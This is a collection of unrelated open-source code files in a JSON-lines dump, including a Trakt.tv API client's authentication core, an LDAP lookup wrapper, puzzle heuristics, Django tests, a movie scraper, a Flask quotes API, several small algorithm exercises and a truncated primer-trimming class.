six.moves.input('Please enter your client secret: ')\n if app_id:\n msg = 'Please enter your application ID ({default}): '.format(\n default=APPLICATION_ID)\n user_input = six.moves.input(msg)\n if user_input:\n APPLICATION_ID = user_input\n return client_id, client_secret\n\n\ndef pin_auth(pin=None, client_id=None, client_secret=None, store=False):\n \"\"\"Generate an access_token from a Trakt API PIN code.\n\n :param pin: Optional Trakt API PIN code. If one is not specified, you will\n be prompted to go generate one\n :param store: Boolean flag used to determine if your trakt api auth data\n should be stored locally on the system. Default is :const:`False` for\n the security conscious\n :return: Your OAuth access token\n \"\"\"\n global OAUTH_TOKEN, CLIENT_ID, CLIENT_SECRET\n CLIENT_ID, CLIENT_SECRET = client_id, client_secret\n if client_id is None and client_secret is None:\n CLIENT_ID, CLIENT_SECRET = _get_client_info(app_id=True)\n\n if pin is None and APPLICATION_ID is None:\n print('You must set the APPLICATION_ID of the Trakt application you '\n 'wish to use. You can find this ID by visiting the following '\n 'URL.')\n print('https://trakt.tv/oauth/applications')\n sys.exit(1)\n if pin is None:\n print('If you do not have a Trakt.tv PIN, please visit the following '\n 'url and log in to generate one.')\n pin_url = 'https://trakt.tv/pin/{id}'.format(id=APPLICATION_ID)\n print(pin_url)\n pin = six.moves.input('Please enter your PIN: ')\n args = {'code': pin,\n 'redirect_uri': REDIRECT_URI,\n 'grant_type': 'authorization_code',\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET}\n\n response = requests.post(''.join([BASE_URL, '/oauth/token']), data=args)\n OAUTH_TOKEN = response.json().get('access_token', None)\n\n if store:\n _store(CLIENT_ID=CLIENT_ID, CLIENT_SECRET=CLIENT_SECRET,\n OAUTH_TOKEN=OAUTH_TOKEN, APPLICATION_ID=APPLICATION_ID)\n return OAUTH_TOKEN\n\n\ndef oauth_auth(username, client_id=None, client_secret=None, store=False):\n \"\"\"Generate an access_token to allow your application to authenticate via\n OAuth\n\n :param username: Your trakt.tv username\n :param client_id: Your Trakt OAuth Application's Client ID\n :param client_secret: Your Trakt OAuth Application's Client Secret\n :param store: Boolean flag used to determine if your trakt api auth data\n should be stored locally on the system. Default is :const:`False` for\n the security conscious\n :return: Your OAuth access token\n \"\"\"\n global CLIENT_ID, CLIENT_SECRET, OAUTH_TOKEN\n if client_id is None and client_secret is None:\n client_id, client_secret = _get_client_info()\n CLIENT_ID, CLIENT_SECRET = client_id, client_secret\n HEADERS['trakt-api-key'] = CLIENT_ID\n\n authorization_base_url = ''.join([BASE_URL, '/oauth/authorize'])\n token_url = ''.join([BASE_URL, '/oauth/token'])\n\n # OAuth endpoints given in the API documentation\n oauth = OAuth2Session(CLIENT_ID, redirect_uri=REDIRECT_URI, state=None)\n\n # Redirect user to Trakt for authorization\n authorization_url, _ = oauth.authorization_url(authorization_base_url,\n username=username)\n print('Please go here and authorize,', authorization_url)\n\n # Get the authorization verifier code from the callback url\n response = six.moves.input('Paste the Code returned here: ')\n # Fetch, assign, and return the access token\n oauth.fetch_token(token_url, client_secret=CLIENT_SECRET, code=response)\n OAUTH_TOKEN = oauth.token['access_token']\n\n if store:\n _store(CLIENT_ID=CLIENT_ID, CLIENT_SECRET=CLIENT_SECRET,\n OAUTH_TOKEN=OAUTH_TOKEN)\n return oauth.token['access_token']\n\n\ndef init(*args, **kwargs):\n \"\"\"Run the auth function specified by *AUTH_METHOD*\"\"\"\n if AUTH_METHOD == PIN_AUTH:\n return pin_auth(*args, **kwargs)\n else:\n return oauth_auth(*args, **kwargs)\n\n\nAirs = namedtuple('Airs', ['day', 'time', 'timezone'])\nAlias = namedtuple('Alias', ['title', 'country'])\nGenre = namedtuple('Genre', ['name', 'slug'])\nComment = namedtuple('Comment', ['id', 'parent_id', 'created_at', 'comment',\n 'spoiler', 'review', 'replies', 'user',\n 'user_rating'])\n\n\ndef _bootstrapped(f):\n \"\"\"Bootstrap your authentication environment when authentication is needed\n and if a file at `CONFIG_PATH` exists. The process is completed by setting\n the client id header.\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n global CLIENT_ID, CLIENT_SECRET, OAUTH_TOKEN\n if (CLIENT_ID is None or CLIENT_SECRET is None) and \\\n os.path.exists(CONFIG_PATH):\n # Load in trakt API auth data fron CONFIG_PATH\n with open(CONFIG_PATH) as config_file:\n config_data = json.load(config_file)\n\n if CLIENT_ID is None:\n CLIENT_ID = config_data.get('CLIENT_ID', None)\n if CLIENT_SECRET is None:\n CLIENT_SECRET = config_data.get('CLIENT_SECRET', None)\n if OAUTH_TOKEN is None:\n OAUTH_TOKEN = config_data['OAUTH_TOKEN']\n\n # For backwards compatability with trakt<=2.3.0\n if api_key is not None and OAUTH_TOKEN is None:\n OAUTH_TOKEN = api_key\n return f(*args, **kwargs)\n return inner\n\n\nclass Core(object):\n \"\"\"This class contains all of the functionality required for interfacing\n with the Trakt.tv API\n \"\"\"\n\n def __init__(self):\n \"\"\"Create a :class:`Core` instance and give it a logger attribute\"\"\"\n self.logger = logging.getLogger('trakt.core')\n\n # Get all of our exceptions except the base exception\n errs = [getattr(errors, att) for att in errors.__all__\n if att != 'TraktException']\n\n # Map HTTP response codes to exception types\n self.error_map = {err.http_code: err for err in errs}\n\n @staticmethod\n def _get_first(f, *args, **kwargs):\n \"\"\"Extract the first value from the provided generator function *f*\n\n :param f: A generator function to extract data from\n :param args: Non keyword args for the generator function\n :param kwargs: Keyword args for the generator function\n :return: The full url for the resource, a generator, and either a data\n payload or `None`\n \"\"\"\n generator = f(*args, **kwargs)\n uri = next(generator)\n if not isinstance(uri, (str, tuple)):\n # Allow properties to safetly yield arbitrary data\n return uri\n if isinstance(uri, tuple):\n uri, data = uri\n return BASE_URL + uri, generator, data\n else:\n return BASE_URL + uri, generator, None\n\n def _handle_request(self, method, url, data=None):\n \"\"\"Handle actually talking out to the trakt API, logging out debug\n information, raising any relevant `TraktException` Exception types,\n and extracting and returning JSON data\n\n :param method: The HTTP method we're executing on. Will be one of\n post, put, delete, get\n :param url: The fully qualified url to send our request to\n :param data: Optional data payload to send to the API\n :return: The decoded JSON response from the Trakt API\n :raises TraktException: If any non-200 return code is encountered\n \"\"\"\n self.logger.debug('%s: %s', method, url)\n HEADERS['trakt-api-key'] = CLIENT_ID\n HEADERS['Authorization'] = 'Bearer {0}'.format(OAUTH_TOKEN)\n self.logger.debug('headers: %s', str(HEADERS))\n self.logger.debug('method, url :: %s, %s', method, url)\n if method == 'get': # GETs need to pass data as params, not body\n response = requests.request(method, url, params=data,\n headers=HEADERS)\n else:\n response = requests.request(method, url, data=json.dumps(data),\n headers=HEADERS)\n self.logger.debug('RESPONSE [%s] (%s): %s', method, url, str(response))\n if response.status_code in self.error_map:\n raise self.error_map[response.status_code]()\n elif response.status_code == 204: # HTTP no content\n return None\n json_data = json.loads(response.content.decode('UTF-8', 'ignore'))\n return json_data\n\n @_bootstrapped\n def get(self, f):\n \"\"\"Perform a HTTP GET request using the provided uri yielded from the\n *f* co-routine. The processed JSON results are then sent back to the\n co-routine for post-processing, the results of which are then returned\n\n :param f: Generator co-routine that yields uri, args, and processed\n results\n :return: The results of the generator co-routine\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n resp = self._get_first(f, *args, **kwargs)\n if not isinstance(resp, tuple):\n # Handle cached property responses\n return resp\n url, generator, _ = resp\n json_data = self._handle_request('get', url)\n try:\n return generator.send(json_data)\n except StopIteration:\n return None\n return inner\n\n @_bootstrapped\n def delete(self, f):\n \"\"\"Perform an HTTP DELETE request using the provided uri\n\n :param f: Function that returns a uri to delete to\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n generator = f(*args, **kwargs)\n uri = next(generator)\n url = BASE_URL + uri\n self._handle_request('delete', url)\n return inner\n\n @_bootstrapped\n def post(self, f):\n \"\"\"Perform an HTTP POST request using the provided uri and optional\n args yielded from the *f* co-routine. The processed JSON results are\n then sent back to the co-routine for post-processing, the results of\n which are then returned\n\n :param f: Generator co-routine that yields uri, args, and processed\n results\n :return: The results of the generator co-routine\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n url, generator, args = self._get_first(f, *args, **kwargs)\n json_data = self._handle_request('post', url, data=args)\n try:\n return generator.send(json_data)\n except StopIteration:\n return None\n return inner\n\n @_bootstrapped\n def put(self, f):\n \"\"\"Perform an HTTP PUT request using the provided uri and optional args\n yielded from the *f* co-routine. The processed JSON results are then\n sent back to the co-routine for post-processing, the results of which\n are then returned\n\n :param f: Generator co-routine that yields uri, args, and processed\n results\n :return: The results of the generator co-routine\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n url, generator, args = self._get_first(f, *args, **kwargs)\n json_data = self._handle_request('put', url, data=args)\n try:\n return generator.send(json_data)\n except StopIteration:\n return None\n return inner\n\n# Here we can simplify the code in each module by exporting these instance\n# method decorators as if they were simple functions.\nCORE = Core()\nget = CORE.get\npost = CORE.post\ndelete = CORE.delete\nput = CORE.put\n","repo_name":"wellspokenman/tag-generator","sub_path":"resources/lib/trakt/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14240,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"38503931755","text":"from ldap3 import ALL_ATTRIBUTES\nfrom ldap3.core.connection import Connection\n\n\nclass LDAPDBWrap(object):\n \"\"\" Wrapper to make an LDAP database look like a dict.\n Returns all info about a user as a dictionary.\n \"\"\"\n\n def __init__(self, uri=\"localhost\", base=\"dc=localhost\", filter_pattern=\"uid={}\"):\n self.uri = uri\n self.base = base\n self.filter_pattern = filter_pattern\n\n def __getitem__(self, user):\n with Connection(self.uri, auto_bind=True) as conn:\n conn.search(self.base, '({})'.format(self.filter_pattern.format(user)),\n attributes=ALL_ATTRIBUTES)\n\n entry = conn.entries[0]\n return entry.entry_get_attributes_dict()\n","repo_name":"rohe/pyuma","sub_path":"src/uma/dbwrap/ldap_wrap.py","file_name":"ldap_wrap.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"34814994795","text":"#Counts how many vehicles are in the way of the ambulance\ndef check_heuristic1(state, multiplier=1):\n list_vehicles = []\n i = 5\n while i >= 0:\n if state.board[2][i] == \"A\":\n break\n if state.board[2][i] != \".\" and state.board[2][i] not in list_vehicles:\n list_vehicles.append(state.board[2][i])\n i -= 1\n\n return len(list_vehicles)\n\n\n#Counts how many positions are taken by cars other than ambulance\ndef check_heuristic2(state, multiplier=1):\n count = 0\n i = 5\n while i >= 0:\n if state.board[2][i] == \"A\":\n break\n if state.board[2][i] != \".\":\n count += 1\n i -= 1\n return count\n\n\ndef check_heuristic3(state, multiplier=1):\n return check_heuristic1(state) * multiplier\n\n#Temporary implementation of\n\"\"\"\nProposed: Count all the cars in between the ambulance and the exit, and add 1 if the cars' orientation is not homogeneous.\n\"\"\"\ndef check_heuristic4(state, multiplier=1):\n list_vehicles =[]\n i = 5\n while i >= 0:\n if state.board[2][i] == \"A\":\n break\n if state.board[2][i] != \".\" and state.board[2][i] not in list_vehicles:\n list_vehicles.append(state.board[2][i])\n i -= 1\n\n #Checks if the cars have different\n has_both_hor_vert=0\n if len(list_vehicles) > 0:\n is_horizontal = state.cars[list_vehicles[0]].horizontal\n for i in range(1,len(list_vehicles)):\n if state.cars[list_vehicles[i]].horizontal != is_horizontal:\n has_both_hor_vert = 1\n break\n return len(list_vehicles) + has_both_hor_vert\n\ndef heuristic_name_from_heuristic(heuristic):\n if heuristic == check_heuristic1:\n return \"h1\"\n elif heuristic == check_heuristic2:\n return \"h2\"\n elif heuristic == check_heuristic3:\n return \"h3\"\n elif heuristic == check_heuristic4:\n return \"h4\"\n return None\n\n","repo_name":"adrientremblay/comp472-mp2","sub_path":"heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6478182490","text":"from django.http import QueryDict\nfrom django.test import tag\nfrom resources.generators.ParityCardsResourceGenerator import ParityCardsResourceGenerator\nfrom tests.resources.generators.utils import BaseGeneratorTest\n\n\n@tag(\"resource\")\nclass ParityCardsResourceGeneratorTest(BaseGeneratorTest):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.language = \"en\"\n self.base_valid_query = QueryDict(\"back_colour=black&paper_size=a4\")\n\n def test_back_colour_values(self):\n generator = ParityCardsResourceGenerator(self.base_valid_query)\n self.run_parameter_smoke_tests(generator, \"back_colour\")\n\n def test_subtitle_black_a4(self):\n query = QueryDict(\"back_colour=black&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Black - a4\"\n )\n\n def test_subtitle_black_letter(self):\n query = QueryDict(\"back_colour=black&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Black - letter\"\n )\n\n def test_subtitle_blue_a4(self):\n query = QueryDict(\"back_colour=blue&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Blue - a4\"\n )\n\n def test_subtitle_blue_letter(self):\n query = QueryDict(\"back_colour=blue&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Blue - letter\"\n )\n\n def test_subtitle_green_a4(self):\n query = QueryDict(\"back_colour=green&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Green - a4\"\n )\n\n def test_subtitle_green_letter(self):\n query = QueryDict(\"back_colour=green&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Green - letter\"\n )\n\n def test_subtitle_purple_a4(self):\n query = QueryDict(\"back_colour=purple&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Purple - a4\"\n )\n\n def test_subtitle_purple_letter(self):\n query = QueryDict(\"back_colour=purple&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Purple - letter\"\n )\n\n def test_subtitle_red_a4(self):\n query = QueryDict(\"back_colour=red&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Red - a4\"\n )\n\n def test_subtitle_red_letter(self):\n query = QueryDict(\"back_colour=red&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Red - letter\"\n )\n","repo_name":"uccser/cs-unplugged","sub_path":"csunplugged/tests/resources/generators/test_parity_cards.py","file_name":"test_parity_cards.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"34"} +{"seq_id":"35019668955","text":"'''\n Kiana Hosaka\n CIS 314 Winter 19\n'''\n\nfrom sys import argv\nfrom RBT import RedBlackTree\n\ndef main(argv):\n fileName = argv[1]\n T = RedBlackTree()\n with open(fileName, 'r') as fob:\n for line in fob:\n l = line.strip().split()\n if len(l) == 2:\n command = l[0]\n data = int(l[1].strip())\n if command == 'insert':\n T.insert(data)\n\n\n if command == 'delete':\n T.delete(data)\n\n # If command is search...\n if command == 'search':\n # If data exists, print the data\n if (T.search(data) == True):\n print(str(data) + ' Found')\n\n if len(l) == 1:\n print(l[0])\n T.traverse(l[0])\n print('')\n\n # for i in range(1, 11):\n # T.insert(i)\n # T.traverse(\"pre-order\")\n # print\n #\n # for i in range(1, 11):\n # T.delete(T.root.key)\n # T.traverse(\"pre-order\")\n # print\n #\n\n\n\nif __name__ == \"__main__\":\n main(argv)\n","repo_name":"kahosaka/coursework","sub_path":"dataStructures/redBlackTree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6483957920","text":"import requests\nimport logging\nfrom os import mkdir\nfrom os.path import exists\nimport json\n\nTOTAL_PAGE = 2\nLIMIT = 10\nINDEX_URL = \"https://dynamic1.scrape.cuiqingcai.com/api/movie/?limit={limit}&offset={offset}\"\nDETAIL_URL = 'https://dynamic1.scrape.cuiqingcai.com/api/movie/{id}'\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s-%(levelname)s:%(message)s')\n\n\ndef scrape_index(page):\n index_url = INDEX_URL.format(limit=LIMIT, offset=(page-1)*LIMIT)\n return scrape_api(index_url)\n\n\ndef scrape_detail(id):\n detail_url = DETAIL_URL.format(id=id)\n return scrape_api(detail_url)\n\n\ndef scrape_api(url):\n logging.info('scraping %s...', url)\n try:\n res = requests.get(url)\n if res.status_code == 200:\n return res.json()\n logging.error('get?invalid?status?code?%s?while?scraping?%s', res.status_code, url)\n except requests.RequestException:\n logging.error('error?occurred?while?scraping?%s', url, exc_info=True)\n\n\nRESULTS_DIR = 'results2'\nexists(RESULTS_DIR) or mkdir(RESULTS_DIR)\n\n\ndef save_json(data):\n name = data.get('name')\n json_path = f'{RESULTS_DIR}/{name}.json'\n json.dump(data, open(json_path, 'w', encoding='utf-8'), ensure_ascii=False, indent=2)\n\n\ndef main():\n for page in range(1, TOTAL_PAGE+1):\n res_index = scrape_index(page)\n for item in res_index.get('results'):\n id = item.get(\"id\")\n res_detail = scrape_detail(id)\n logging.info('detail data %s', res_detail)\n save_json(res_detail)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fox2moon/52crawler","sub_path":"第13讲:Ajax 爬取案例实战/getMovieByAjax_2.py","file_name":"getMovieByAjax_2.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"43174000449","text":"\"\"\"\nBubble Sort is the simplest sorting algorithm that works by repeatedly swapping \nthe adjacent elements if they are in the wrong order. This algorithm is not \nsuitable for large data sets as its average and worst-case time complexity \nis quite high\n\n\n{\n\n When to use Bubble Sort?\n - When the input is already sorted\n - Space is a concern\n - Easy to implement\nWhen to avoid Bubble Sort?\n - Average time complexity is poor\n}\n\n\"\"\"\n\n\ndef BubbleSortAlgo(customLIst):\n \"\"\"\n Time complexity ---O(N^2)\n Space complexity --O(1)\n \"\"\"\n for i in range(len(customLIst)-1):#O(n)\n for j in range(len(customLIst)-i-1):#O(n)\n if customLIst[j]>customLIst[j+1]:\n customLIst[j],customLIst[j+1]=customLIst[j+1],customLIst[j]\n return customLIst\n\nunsortlist=[4,3,2,6,8,3,22,5,6]\nx=BubbleSortAlgo(unsortlist)\nprint(x)\n","repo_name":"RahulGupta237/Data-Structure-And-Algorithm-in-Python","sub_path":"sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74051486178","text":"from flask import Flask, request\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///quotes.db'\ndb=SQLAlchemy(app)\n\nclass Quotes(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n author = db.Column(db.String(80))\n text = db.Column(db.String(150))\n\n def __repr__(self):\n return f\"{self.text} - {self.author}\"\n\n@app.route('/')\ndef index():\n return f'Try /quotes , /quotes/(id)'\n\n@app.route('/quotes')\ndef get_quotes():\n quotes = Quotes.query.all()\n\n output = []\n for q in quotes:\n quotes_data= {'Author': q.author,'Quote:':q.text}\n output.append(quotes_data)\n return {\"quotes\":output}\n\n@app.route('/quotes/')\ndef get_quote(id):\n quote = Quotes.query.get_or_404(id)\n return {'Author':quote.author, \"Quote\": quote.text}\n\n@app.route('/quotes', methods=['POST'])\ndef add_quote():\n q = Quotes(author=request.json['author'], text=request.json['text'])\n db.session.add(q)\n db.session.commit()\n return f\"Succesfully added!\"\n\n@app.route('/quotes/', methods=['DELETE'])\ndef delete_quote(id):\n q=Quotes.query.get(id)\n if q is None:\n return {\"error\":\"not found\"}\n db.session.delete(q)\n db.session.commit()\n return {\"message\": f\"This quote:'{q.text}', was Deleted\"}\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Yazan-AbuAwad/quotes-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71297907617","text":"\"\"\"\n'S'=晴\n'C'=曇\n'R'=雨\n3日間で天気予報が的中した日が何日あるかを出力せよ。\n\n入力\nCSS\nCSR\n\n出力\n2\n\"\"\"\n\n#S= ['C', 'S', 'S']\n#T= ['C', 'S', 'R']\n\nS= input()\nT= input()\n\nS_list = []\nT_list = []\ndef split_lint(text, list):\n words=text.split()\n for word in words:\n list.append(word)\nsplit_lint(S, S_list)\nsplit_lint(T, T_list)\n\ncount=0\nfor i in range(3):\n if S_list[i] == T_list[i]:\n count += 1\nprint(count)","repo_name":"KFurudate/Atcoder_SHOJIN","sub_path":"Atcoder/20190901_AtCoder_Beginner_Contest_139/Tenki.py","file_name":"Tenki.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8224995774","text":"# 119. Pascal's Triangle II\n# Easy\n\n# Given an integer rowIndex, return the rowIndexth row of the Pascal's triangle.\n\nclass Solution(object):\n def getRow(self, rowIndex):\n \"\"\"\n :type rowIndex: int\n :rtype: List[int]\n \"\"\"\n dp = [1]*(rowIndex + 1)\n\n for row in range(rowIndex+1):\n dp[row] = [1] * (row+1)\n\n for row in range(2, rowIndex + 1):\n for k in range(1, row):\n dp[row][k] = dp[row-1][k] + dp[row-1][k-1]\n\n return dp[rowIndex]\n","repo_name":"atolat/algorithms-lc","sub_path":"DP/Counting/pascal-ii.py","file_name":"pascal-ii.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36762433826","text":"#!/usr/bin/python3\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\n# import os\nimport sys\nimport time\n# import simplejson as json\n# from threading import Timer\n\n\n##################################################\n# construct registration\n\nimport _rightThumb._construct as __\nappDBA = __.clearFocus( __name__, __file__ )\n# appDBA = __name__\n__.appReg = appDBA\ndef focus( parentApp='', childApp='', reg=True ):\n\tglobal appDBA\n\tf = __.appName( appDBA, parentApp, childApp )\n\tif reg:\n\t\t__.appReg = f\n\treturn f\n__.registeredApps.append(focus())\nimport _rightThumb._base3 as _\n_.load()\n\n##################################################\n\nimport _rightThumb._vars as _v\nimport _rightThumb._string as _str\n# import _rightThumb._date as _date\n# import _rightThumb._dir as _dir\n# import _rightThumb._md5 as _md5\n# import _rightThumb._mimetype as _mime\n\n# import _rightThumb._auditCodeBase as _code\n# _code = _.regImp( focus(), '_rightThumb._auditCodeBase' )\n\n##################################################\n\n# from lxml import html\n# import requests\n# import cssselect\n# import sqlite3\n\n##################################################\n\n\ndef appSwitches():\n\t_.switches.register('Invert', '-i')\n\t_.switches.register('Delim', '-del')\n\t_.switches.register('Prefix', '-pre')\n\t\n\n\n\n_.appInfo[focus()] = {\n\t'file': 'thisApp.py',\n\t'description': 'Changes the world',\n\t'categories': [\n\t\t\t\t\t\t'research',\n\t\t\t\t\t\t'text manipulation',\n\t\t\t\t],\n\t'relatedapps': [],\n\t'prerequisite': [],\n\t'examples': [],\n\t'columns': [],\n\t}\n\n_.appData[focus()] = {\n\t'start': time.time(),\n\t'uuid': '',\n\t'audit': [],\n\t'pipe': [],\n\t}\n\n_.appInfo[focus()]['examples'].append('p thisApp -file file.txt')\n\n# _.appInfo[focus()]['columns'].append({'name': 'name', 'abbreviation': 'n'})\n\n\n\n\n\ndef registerSwitches( argvProcessForce=False ):\n\tglobal appDBA\n\tif not __.appReg == appDBA and appDBA in __.appReg:\n\n\t\tif not __name__ == '__main__':\n\t\t\t_.argvProcess = argvProcessForce\n\t\telse:\n\t\t\t_.argvProcess = True\n\n\t\t_.load()\n\t\t_.appInfo[__.appReg] = _.appInfo[appDBA]\n\t\t_.appData[__.appReg] = _.appData[appDBA]\n\t__.constructRegistration(_.appInfo[__.appReg]['file'],__.appReg)\n\tappSwitches()\n\t_.defaultScriptTriggers()\n\t# _.switches.trigger('Watched', _.txt2Date)\n\t# _.switches.trigger('Input',_.formatColumns)\n\t_.switches.process()\n\n\n\nif not __name__ == '__main__':\n\t_.argvProcess = False\nelse:\n\t_.argvProcess = True\n\nregisterSwitches()\n\n\n\n\n\ndef fieldSet( switchName, switchField, switchValue, theFocus=False ):\n\tif not type( theFocus ) == bool:\n\t\ttheFocus = theFocus\n\t_.switches.fieldSet( switchName, switchField, switchValue, theFocus )\n\ndef setPipeData(data):\n\t# _.appData[__.appReg]['pipe'] = list(data)\n\tif len(data) > 0:\n\t\t_.appData[__.appReg]['pipe'] = []\n\t\tfor pd in data:\n\t\t\tpd = pd.replace('\\n','')\n\t\t\tif not pd == '':\n\t\t\t\t_.appData[__.appReg]['pipe'].append(pd)\n\ndef pipeCleaner():\n\tif len( _.appData[__.appReg]['pipe'] ):\n\t\tif type( _.appData[__.appReg]['pipe'][0] ) == str:\n\t\t\tif not _.appData[__.appReg]['pipe'][0][0] in _str.safeChar:\n\t\t\t\t_.appData[__.appReg]['pipe'][0] = _.appData[__.appReg]['pipe'][0][1:]\n\t\t\tfor i,pipeData in enumerate(_.appData[__.appReg]['pipe']):\n\t\t\t\t_.appData[__.appReg]['pipe'][i] = _.appData[__.appReg]['pipe'][i].replace('\\n','')\n\n\n\n\n_.appData[__.appReg]['pipe'] = False\nif not sys.stdin.isatty():\n\tsetPipeData( sys.stdin.readlines() )\n\t# _.appData[__.appReg]['pipe'] = sys.stdin.readlines()\n\t# pipeCleaner()\n\n\n\n########################################################################################\n\n########################################################################################\n########################################################################################\n# START\n\n\n\ndef action():\n\t\n\tif not type( _.appData[__.appReg]['pipe'] ) == bool:\n\n\t\tdone = []\n\n\t\tinv = list(_.appData[__.appReg]['pipe'])\n\t\tinv.reverse()\n\t\tif _.switches.isActive('Invert'):\n\t\t\t_.appData[__.appReg]['pipe'].reverse()\n\t\t\tinv.reverse()\n\n\t\t_.pr( 'bc:', __.appReg )\n\n\t\tfor data0 in _.appData[__.appReg]['pipe']:\n\n\t\t\tfor data1 in inv:\n\t\t\t\tdone.append( data0+','+data0 )\n\t\t\t\tdone.append( data1+','+data1 )\n\t\t\t\tif not data0+','+data1 in done and not data1+','+data0 in done:\n\t\t\t\t\tdone.append( data0+','+data1 )\n\t\t\t\t\tnewData = data0+','+data1\n\t\t\t\t\tif _.switches.isActive('Delim'):\n\t\t\t\t\t\tnewData = newData.replace( ',', _.switches.value('Delim') )\n\t\t\t\t\tif _.switches.isActive('Prefix'):\n\t\t\t\t\t\tnewData = _.switches.value('Prefix') + ' ' + newData\n\t\t\t\t\t_.pr( newData )\n\n\n\n\n########################################################################################\nif __name__ == '__main__':\n\taction()\n\n\n\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/buildCombos.py","file_name":"buildCombos.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"42397556124","text":"import pandas\nimport os\nimport random\nimport argparse\nimport re\nfrom FastqStreamer.FastqReader import FastqReader\nfrom BamStreamer.BamPairs import read_two_bams\nfrom trimPrimers.utils import *\n\nclass IPetePrimerTrimmer(FastqReader):\n \"\"\"\n Parse primer alignments from reads, trim primers from ends\n \"\"\"\n\n def __init__(self, primer_info, expected_v_start):\n \"\"\"\n Parameters\n ----------\n reference_annot_file : Str\n reference annotation format for primer sequences\n\n \"\"\"\n FastqReader.__init__(self)\n self.expected_v_start = expected_v_start\n self.reference = import_primer_reference(primer_info)\n \n def get_aln_stats(self, read, whichGene):\n \"\"\"\n get alignment information about a read\n\n Parameters\n ----------\n read : dict\n read record returned by FastqReader\n\n whichGene : Str\n which read \"read1\" or \"read2\"\n\n Returns\n -------\n stats : Str\n A string containing alignment information\n \"\"\"\n \n stats = \"{name}\\t{start}\\t{end}\\t{qStart}\\t{qEnd}\\t{score}\\t{cigar}\\t{mismatch}\\t{insertion}\\t{deletion}\\t{percentId}\\t{alnType}\\t{primerLen}\"\n if read[whichGene] is not None:\n refName = read[whichGene][\"reference_name\"]\n return stats.format(name=read[whichGene][\"reference_name\"].split(\"__\")[0],\n start=read[whichGene][\"start\"],\n end=read[whichGene][\"end\"],\n qStart=read[whichGene][\"query_start\"],\n qEnd=read[whichGene][\"query_end\"],\n score=read[whichGene][\"score\"],\n cigar=read[whichGene][\"cigar\"],\n mismatch=read[whichGene][\"mismatches\"],\n insertion=read[whichGene][\"insertions\"],\n deletion=read[whichGene][\"deletions\"],\n percentId=read[whichGene][\"percent_identity\"],\n alnType=read[whichGene][\"classification\"],\n primerLen=len(self.reference[refName][\"seq\"]))\n else:\n return stats.format(name=\"\",\n start=\"\",\n end=\"\",\n qStart=\"\",\n qEnd=\"\",\n score=\"\",\n cigar=\"\",\n mismatch=\"\",\n insertion=\"\",\n deletion=\"\",\n percentId=\"\",\n alnType=\"\",\n primerLen=\"\")\n\n def write_aln_stats(self, read, filename):\n \"\"\"\n write alignment information to file, combining V and J gene alignments\n\n Parameters\n ----------\n read : dict\n read record returned by 